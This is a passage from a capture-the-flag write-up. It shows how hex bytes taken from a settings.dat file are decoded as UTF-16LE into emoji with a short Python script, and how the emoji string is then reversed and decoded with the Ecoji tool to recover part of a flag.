From the `settings.dat` file, we can observe the presence of `1` and `0` before the `Unicode characters`. I then filtered the hex values that contained 1, and used the following script to convert them into `emojis`
```python=
hex_data = [
"31", "00", "09", "00", "15", "26", "0A", "00", "31", "00", "09", "00", "3C", "D8", "68", "DF",
"0A", "00", "31", "00", "09", "00", "3E", "D8", "EC", "DD", "0A", "00", "31", "00", "09", "00",
"3E", "D8", "1B", "DD", "0A", "00", "31", "00", "09", "00", "3C", "D8", "54", "DF", "0A", "00",
"31", "00", "09", "00", "3D", "D8", "83", "DE", "0A", "00", "31", "00", "09", "00", "3D", "D8",
"69", "DC", "0A", "00", "31", "00", "09", "00", "3D", "D8", "30", "DC", "0A", "00", "31", "00",
"09", "00", "3D", "D8", "96", "DD", "0A", "00", "31", "00", "09", "00", "3D", "D8", "82", "DE",
"0A", "00", "31", "00", "09", "00", "3D", "D8", "85", "DC", "0A", "00", "31", "00", "09", "00",
"3D", "D8", "C1", "DE", "0A", "00", "31", "00", "09", "00", "3D", "D8", "F0", "DC", "0A", "00",
"31", "00", "09", "00", "3C", "D8", "4C", "DF", "0A", "00", "31", "00", "09", "00", "3E", "D8",
"D9", "DD", "0D", "20", "42", "26", "0F", "FE", "0A", "00"
]
def hex_to_unicode(hex_data):
hex_string = ''.join(hex_data)
byte_data = bytes.fromhex(hex_string)
unicode_chars = byte_data.decode('utf-16le')
return unicode_chars
unicode_result = hex_to_unicode(hex_data)
emoji_list = [char for char in unicode_result if char.strip() and char != '1']
print(' '.join(emoji_list))
#☕ 🍨 🧬 🤛 🍔 🚃 👩 🐰 🖖 🚂 💅 🛁 📰 🍌 🧙 ♂
```
At this point, I used a tool related to `emojis` to try decoding. ([link tool here](https://github.com/keith-turner/ecoji))
After some attempts, I kept encountering errors.
At this point, I tried encoding the first part of the `flag` to compare.
We can see that it is reversed, so I reversed the `emojis` and tried to decode them again. Note that we need to remove the spaces to match the correct format.
**Part 2 at** [**here**](https://hackmd.io/SpvlMl18TP69qpic2VuQVA)
Sign in with Wallet
Connect another wallet